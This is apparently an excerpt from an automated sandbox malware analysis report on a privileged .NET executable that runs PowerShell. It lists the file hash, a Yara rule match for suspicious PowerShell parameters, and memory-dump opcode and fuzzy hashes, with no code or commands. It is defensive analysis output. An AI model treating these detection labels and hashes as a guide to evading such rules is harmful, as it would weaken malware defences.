                                                                                                  File size:473600 bytes
                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                  Reputation:high

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                    Executed Functions

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.441569843.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff00260000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b541d933887fb8ca8344f62c8d51fdc89d948b37ddaca1c646c93dbe63f7713b
                                                                                                    • Instruction ID: 299ab62cf11e2b50f72cb64372ad3b5b68bdcc1b6b1861798accc7cb4d370934
                                                                                                    • Opcode Fuzzy Hash: b541d933887fb8ca8344f62c8d51fdc89d948b37ddaca1c646c93dbe63f7713b
                                                                                                    • Instruction Fuzzy Hash: AF41016194E7C64FE70397789CA46A27FB0AF17215B1E00E7D488CF0F3D9489999C322
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.441569843.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ff00260000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fb662b233aaaf9b689b804bd809d1d3ac7b93a9fd57ff3d6539c96d4177ea8c2
                                                                                                    • Instruction ID: 6d01a30c7228dbda803bd29950242140ac5d0fd7e26da01451dae2eeac2e1510
                                                                                                    • Opcode Fuzzy Hash: fb662b233aaaf9b689b804bd809d1d3ac7b93a9fd57ff3d6539c96d4177ea8c2
                                                                                                    • Instruction Fuzzy Hash: B211C86245E3C44FD7138B789C64AA03FB0AF57204B0E05DBD8C8CF0A3E6186A69D363
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions